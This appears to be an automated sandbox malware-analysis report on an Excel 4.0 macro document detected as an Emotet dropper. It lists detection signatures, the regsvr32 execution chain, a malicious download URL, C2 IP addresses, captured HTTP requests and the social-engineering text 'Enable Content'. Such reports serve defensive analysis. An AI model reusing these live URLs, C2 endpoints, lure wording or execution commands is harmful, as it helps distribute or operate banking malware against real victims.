Windows Analysis Report
commenti_19265309.xlsm

Overview

General Information

Sample Name: commenti_19265309.xlsm
Analysis ID: 581726
MD5: ea31d45aabef92c32f90ec8d5ee3fc88
SHA1: 16d18be1150fdde8d16c2cae9f92de453ca7342c
SHA256: e287a83571ac14de139663276caeea8ee7c53db3c2c6660f9520d43ac0eb9985
Tags: xlsm

Detection

Hidden Macro 4.0 Emotet
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Document exploit detected (drops PE files)
System process connects to network (likely due to code injection or exploit)
Document exploit detected (creates forbidden files)
Antivirus detection for URL or domain
Found malicious Excel 4.0 Macro
Found malware configuration
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Yara detected Emotet
Multi AV Scanner detection for domain / URL
Sigma detected: Regsvr32 Command Line Without DLL
Hides that the sample has been downloaded from the Internet (zone.identifier)
Document exploit detected (process start blacklist hit)
Office process drops PE file
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: Regsvr32 Network Activity
Found Excel 4.0 Macro with suspicious formulas
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Document exploit detected (UrlDownloadToFile)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Found a hidden Excel 4.0 Macro sheet
Potential document exploit detected (unknown TCP traffic)
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Drops PE files to the user directory
Excel documents contains an embedded macro which executes code when the document is opened
Found large amount of non-executed APIs
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard
Queries the volume information (name, serial number etc) of a device
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Creates files inside the system directory
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Stores large binary data to the registry
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sigma detected: Excel Network Connections
Found dropped PE file which has not been started or loaded
Potential document exploit detected (performs DNS queries)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Yara detected Xls With Macro 4.0
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Connects to several IPs in different countries
Potential key logger detected (key state polling based)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Potential document exploit detected (performs HTTP gets)

Classification

  • System is w7x64
  • EXCEL.EXE (PID: 2548 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • regsvr32.exe (PID: 1164 cmdline: C:\Windows\SysWow64\regsvr32.exe /s ..\sei.ocx MD5: 432BE6CF7311062633459EEF6B242FB5)
      • regsvr32.exe (PID: 2860 cmdline: C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Ufazcuvgqkvqusea\tadr.wns" MD5: 432BE6CF7311062633459EEF6B242FB5)
        • regsvr32.exe (PID: 2932 cmdline: C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Pvpcradve\zcxodsyppc.vhu" MD5: 432BE6CF7311062633459EEF6B242FB5)
          • regsvr32.exe (PID: 1712 cmdline: C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Akcjix\aahvlaakfpltdqe.tfa" MD5: 432BE6CF7311062633459EEF6B242FB5)
            • regsvr32.exe (PID: 1156 cmdline: C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Iemtm\pldpzerct.pbt" MD5: 432BE6CF7311062633459EEF6B242FB5)
              • regsvr32.exe (PID: 3060 cmdline: C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Norixqjmezaqkg\rmjvbhreoaju.ozu" MD5: 432BE6CF7311062633459EEF6B242FB5)
                • regsvr32.exe (PID: 2540 cmdline: C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Wlsoaenkkrveuupx\vqctv.ugg" MD5: 432BE6CF7311062633459EEF6B242FB5)
                  • regsvr32.exe (PID: 3056 cmdline: C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Fjfbdmakik\lfmekztlcu.eak" MD5: 432BE6CF7311062633459EEF6B242FB5)
                    • regsvr32.exe (PID: 788 cmdline: C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Qjxnmbewg\psrzxbseam.bej" MD5: 432BE6CF7311062633459EEF6B242FB5)
                      • regsvr32.exe (PID: 2652 cmdline: C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Xuxdamzseerbd\xnhieyc.mhi" MD5: 432BE6CF7311062633459EEF6B242FB5)
                        • regsvr32.exe (PID: 1408 cmdline: C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Txlhge\upsbekiq.mnw" MD5: 432BE6CF7311062633459EEF6B242FB5)
                          • regsvr32.exe (PID: 1468 cmdline: C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Qitnzewoiifn\ioax.zvc" MD5: 432BE6CF7311062633459EEF6B242FB5)
                            • regsvr32.exe (PID: 2036 cmdline: C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Wjrcyousgqt\whqvqq.kkc" MD5: 432BE6CF7311062633459EEF6B242FB5)
  • cleanup
Source | Rule | Description | Author | Strings
app.xml | JoeSecurity_XlsWithMacro4 | Yara detected Xls With Macro 4.0 | Joe Security |

Source | Rule | Description | Author | Strings
00000003.00000002.438925109.0000000000461000.00000020.00000800.00020000.00000000.sdmp | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security |
0000000F.00000002.714099978.0000000000501000.00000020.00000800.00020000.00000000.sdmp | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security |
00000009.00000002.483801415.0000000000110000.00000040.00000800.00020000.00000000.sdmp | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security |
0000000D.00000002.510846343.0000000000231000.00000020.00000800.00020000.00000000.sdmp | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security |
00000009.00000002.483924206.0000000000471000.00000020.00000800.00020000.00000000.sdmp | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security |

Source | Rule | Description | Author | Strings
5.2.regsvr32.exe.980000.1.unpack | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security |
8.2.regsvr32.exe.150000.0.raw.unpack | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security |
9.2.regsvr32.exe.110000.0.unpack | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security |
15.2.regsvr32.exe.240000.0.unpack | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security |
3.2.regsvr32.exe.460000.1.unpack | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security |

                        System Summary

                        Source: Process started Author: Florian Roth: Data: Command: C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Ufazcuvgqkvqusea\tadr.wns", CommandLine: C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Ufazcuvgqkvqusea\tadr.wns", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: C:\Windows\SysWow64\regsvr32.exe /s ..\sei.ocx, ParentImage: C:\Windows\SysWOW64\regsvr32.exe, ParentProcessId: 1164, ProcessCommandLine: C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Ufazcuvgqkvqusea\tadr.wns", ProcessId: 2860
                        Source: Process started Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: C:\Windows\SysWow64\regsvr32.exe /s ..\sei.ocx, CommandLine: C:\Windows\SysWow64\regsvr32.exe /s ..\sei.ocx, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2548, ProcessCommandLine: C:\Windows\SysWow64\regsvr32.exe /s ..\sei.ocx, ProcessId: 1164
                        Source: Network Connection Author: Dmitriy Lifanov, oscd.community: Data: DestinationIp: 168.119.39.118, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\regsvr32.exe, Initiated: true, ProcessId: 2036, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49166
                        Source: Network Connection Author: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0": Data: DestinationIp: 212.64.200.154, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 2548, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
                        Source: Registry Key set Author: frack113: Data: EventID: 13, EventType: SetValue, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 2548, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings

                        AV Detection

                        Source: http://gymsportive.com/0zwe/pSiUh/ Avira URL Cloud: Label: malware
                        Source: 13.2.regsvr32.exe.230000.1.unpack Malware Configuration Extractor: Emotet
                        Source: commenti_19265309.xlsm ReversingLabs: Detection: 51%
                        Source: gymsportive.com Virustotal: Detection: 6%
                        Source: http://gymsportive.com/0zwe/pSiUh/ Virustotal: Detection: 13%
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                        Source: unknown HTTPS traffic detected: 168.119.39.118:443 -> 192.168.2.22:49166 version: TLS 1.2
                        Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_1002992A __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,3_2_1002992A

                        Software Vulnerabilities

                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: Lg1r0mo1[1].dll.0.dr
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Lg1r0mo1[1].dll
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\SysWOW64\regsvr32.exe
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
                        Source: global traffic TCP traffic: 192.168.2.22:49165 -> 212.64.200.154:80
                        Source: global traffic DNS query: name: gymsportive.com
                        Source: global traffic TCP traffic: 192.168.2.22:49166 -> 168.119.39.118:443

                        Networking

                        Source: C:\Windows\SysWOW64\regsvr32.exe Network Connect: 168.119.39.118 187
                        Source: Joe Sandbox View JA3 fingerprint: eb88d0b3e1961a0562f006e5ce2a0b87
                        Source: global traffic HTTP traffic detected:
                            GET /RTqOvyibSpsqRLeCHAwzwsZUvkaT HTTP/1.1
                            Cookie: qNjwxkh=AFLTfK9fIBK6lnbulhI7c8xuJYBHytmEF4RnscbegU5ARco2Ov+wvYmlCWGjR5iRbpiDElFN0mE7/RzA1kBHXra1n+DdZZ/0nWkhpfgcHvYmOKaBSaM2AlKPdCLcHXfASzT21JxpI+itOUwulg0p/YvVS81C8mnpxG+6TaYEIXQNyx0QR8otuNcfuEKU4QpHu9EKg/ECc3gGVpKbTk7/I2FJs30AWb2pLbxGdfiqBgsF51+Oaaj/uTpMmG1137PAZBtRtn3mSRV+k/bNw0I3O4V3sJnZYPMRB6W35SRjpQR4FfjE4A==
                            Host: 168.119.39.118
                            Connection: Keep-Alive
                            Cache-Control: no-cache
                        Source: global traffic HTTP traffic detected:
                            HTTP/1.1 200 OK
                            Cache-Control: no-cache, must-revalidate
                            Pragma: no-cache
                            Content-Type: application/x-msdownload
                            Expires: Wed, 02 Mar 2022 15:42:19 GMT
                            Last-Modified: Wed, 02 Mar 2022 15:42:19 GMT
                            Server:
                            Set-Cookie: 621f905be66af=1646235739; expires=Wed, 02-Mar-2022 15:43:19 GMT; Max-Age=60; path=/
                            Content-Disposition: attachment; filename="Lg1r0mo1.dll"
                            Content-Transfer-Encoding: binary
                            X-Powered-By-Plesk: PleskWin
                            Date: Wed, 02 Mar 2022 15:43:42 GMT
                            Content-Length: 1028096
                        Source: global traffic HTTP traffic detected:
                            GET /0zwe/pSiUh/ HTTP/1.1
                            Accept: */*
                            UA-CPU: AMD64
                            Accept-Encoding: gzip, deflate
                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                            Host: gymsportive.com
                            Connection: Keep-Alive
                        Source: Joe Sandbox View ASN Name: AS-CHOOPAUS AS-CHOOPAUS
                        Source: Joe Sandbox View ASN Name: DIGITALOCEAN-ASNUS DIGITALOCEAN-ASNUS
                        Source: Joe Sandbox View IP Address: 207.148.81.119 207.148.81.119
                        Source: Joe Sandbox View IP Address: 104.131.62.48 104.131.62.48
                        Source: unknown Network traffic detected: IP country count 16
                        Source: regsvr32.exe, 0000000F.00000002.714076663.0000000000340000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000F.00000002.714272238.0000000003318000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
                        Source: regsvr32.exe, 0000000F.00000002.714272238.0000000003318000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.entrust.net/2048ca.crl0
                        Source: regsvr32.exe, 0000000F.00000002.714076663.0000000000340000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000F.00000002.714272238.0000000003318000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.entrust.net/server1.crl0
                        Source: regsvr32.exe, 0000000F.00000002.714272238.0000000003318000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                        Source: regsvr32.exe, 0000000F.00000002.714076663.0000000000340000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
                        Source: regsvr32.exe, 0000000F.00000002.714076663.0000000000340000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000F.00000002.714272238.0000000003318000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
                        Source: regsvr32.exe, 0000000F.00000002.714272238.0000000003318000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0
                        Source: regsvr32.exe, 0000000F.00000002.714076663.0000000000340000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0%
                        Source: regsvr32.exe, 0000000F.00000002.714272238.0000000003318000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0-
                        Source: regsvr32.exe, 0000000F.00000002.714272238.0000000003318000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0/
                        Source: regsvr32.exe, 0000000F.00000002.714076663.0000000000340000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com05
                        Source: regsvr32.exe, 0000000F.00000002.714076663.0000000000340000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000F.00000002.714272238.0000000003318000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.entrust.net03
                        Source: regsvr32.exe, 0000000F.00000002.714272238.0000000003318000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.entrust.net0D
                        Source: regsvr32.exe, 0000000F.00000002.714272238.0000000003318000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.digicert.com.my/cps.htm02
                        Source: regsvr32.exe, 0000000F.00000002.714076663.0000000000340000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000F.00000002.714272238.0000000003318000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
                        Source: regsvr32.exe, 0000000F.00000002.714066011.000000000032D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://168.119.39.118/
                        Source: regsvr32.exe, 0000000F.00000002.714066011.000000000032D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://168.119.39.118/.N
                        Source: regsvr32.exe, 0000000F.00000002.714070000.0000000000332000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://168.119.39.118/RTqOvyibSpsqRLeCHAwzwsZUvkaT
                        Source: regsvr32.exe, 0000000F.00000002.714070000.0000000000332000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://168.119.39.118/RTqOvyibSpsqRLeCHAwzwsZUvkaTI
                        Source: regsvr32.exe, 0000000F.00000002.714076663.0000000000340000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000F.00000002.714272238.0000000003318000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://secure.comodo.com/CPS0
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\44EDD626.png
                        Source: unknown DNS traffic detected: queries for: gymsportive.com
                        Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49166
                        Source: unknown Network traffic detected: HTTP traffic on port 49166 -> 443
                        Source: unknown TCP traffic detected without corresponding DNS query: 168.119.39.118
                        Source: regsvr32.exe, 0000000F.00000002.714272238.0000000003318000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
                        Source: unknown HTTPS traffic detected: 168.119.39.118:443 -> 192.168.2.22:49166 version: TLS 1.2
                        Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_1000105A __EH_prolog3,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_strcat,GlobalUnlock,SetClipboardData,CloseClipboard,3_2_1000105A
                        Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_10043612 ScreenToClient,_memset,GetKeyState,GetKeyState,GetKeyState,KillTimer,IsWindow,3_2_10043612
                        Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_1001A1A1 GetKeyState,GetKeyState,GetKeyState,GetKeyState,3_2_1001A1A1
                        Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_100422FA GetKeyState,GetKeyState,GetKeyState,3_2_100422FA
                        Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_100464D4 __EH_prolog3,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetParent,SendMessageA,_memset,ScreenToClient,_memset,GetCursorPos,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SetWindowPos,SendMessageA,_memset,SendMessageA,GetParent,3_2_100464D4
                        Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_100145C3 GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,3_2_100145C3
                        Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_100368ED GetKeyState,GetKeyState,GetKeyState,GetFocus,GetDesktopWindow,SendMessageA,SendMessageA,GetParent,3_2_100368ED

                        E-Banking Fraud


                        System Summary

                        Source: commenti_19265309.xlsm, Macro extractor: Sheet: EFALGV contains: URLDownloadToFileA
                        Source: commenti_19265309.xlsm, Macro extractor: Sheet: EFALGV contains: urlmon
                        Source: Screenshot number: 4, Screenshot OCR: Enable Editing and click Enable Content.
                        Source: Screenshot number: 4, Screenshot OCR: Enable Content.
                        Source: Screenshot number: 8, Screenshot OCR: Enable Editing and click Enable Content.
                        Source: Screenshot number: 8, Screenshot OCR: Enable Content.
                        Source: Screenshot number: 12, Screenshot OCR: Enable Editing and click Enable Content.
                        Source: Screenshot number: 12, Screenshot OCR: Enable Content.
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File created: C:\Users\user\sei.ocx
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Lg1r0mo1[1].dll
                        Source: commenti_19265309.xlsm, Initial sample: EXEC
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_0057A01C6_2_0057A01C
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_0058B2156_2_0058B215
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_0057B2006_2_0057B200
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_0057F43B6_2_0057F43B
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_0058882F6_2_0058882F
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_0058DAD86_2_0058DAD8
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_00583CDD6_2_00583CDD
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_0057CED86_2_0057CED8
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_005772CC6_2_005772CC
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_005718F66_2_005718F6
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_0058BAF26_2_0058BAF2
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_00591AE96_2_00591AE9
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_005788E56_2_005788E5
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_0058EC9B6_2_0058EC9B
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_00575C9A6_2_00575C9A
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_0057D8996_2_0057D899
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_005854976_2_00585497
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_005800976_2_00580097
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_00576A8D6_2_00576A8D
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_0057508B6_2_0057508B
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_0058B6876_2_0058B687
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_0058D6B16_2_0058D6B1
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_0058A4B56_2_0058A4B5
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_005816AD6_2_005816AD
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_0057DB596_2_0057DB59
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_005743426_2_00574342
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_00580F7A6_2_00580F7A
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_0057E3796_2_0057E379
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_00585D686_2_00585D68
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_0058C16B6_2_0058C16B
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_00573F096_2_00573F09
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_00571B096_2_00571B09
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_005791336_2_00579133
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_005719306_2_00571930
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_0058C5356_2_0058C535
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_0058692B6_2_0058692B
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_0057BB236_2_0057BB23
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_0058112D6_2_0058112D
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_005927DF6_2_005927DF
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_0057C7D16_2_0057C7D1
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_005847D26_2_005847D2
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_005841CF6_2_005841CF
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_005913FD6_2_005913FD
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_005903F26_2_005903F2
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_005851E86_2_005851E8
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_005759956_2_00575995
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_005775996_2_00577599
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_005777866_2_00577786
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_0058E18B6_2_0058E18B
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_0057F7846_2_0057F784
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_00579B806_2_00579B80
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_005891846_2_00589184
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_0058B3846_2_0058B384
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_00574BB46_2_00574BB4
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_0058AFB06_2_0058AFB0
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_005895A86_2_005895A8
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_00581DA66_2_00581DA6
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001D04188_2_001D0418
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001CBE098_2_001CBE09
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001C6CBB8_2_001C6CBB
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001C66B08_2_001C66B0
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001DEAA38_2_001DEAA3
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001CB4FC8_2_001CB4FC
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001C35118_2_001C3511
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001E110E8_2_001E110E
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001C47008_2_001C4700
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001DD14C8_2_001DD14C
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001CD3468_2_001CD346
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001CE1A98_2_001CE1A9
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001CF1D58_2_001CF1D5
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001D1FD08_2_001D1FD0
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001D09F98_2_001D09F9
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001D63F08_2_001D63F0
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001CA01C8_2_001CA01C
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001E1E198_2_001E1E19
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001DB2158_2_001DB215
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001C96178_2_001C9617
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001DDE118_2_001DDE11
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001DE6128_2_001DE612
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001CB2008_2_001CB200
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001CF43B8_2_001CF43B
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001D882F8_2_001D882F
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001E225A8_2_001E225A
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001C3C518_2_001C3C51
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001DF24C8_2_001DF24C
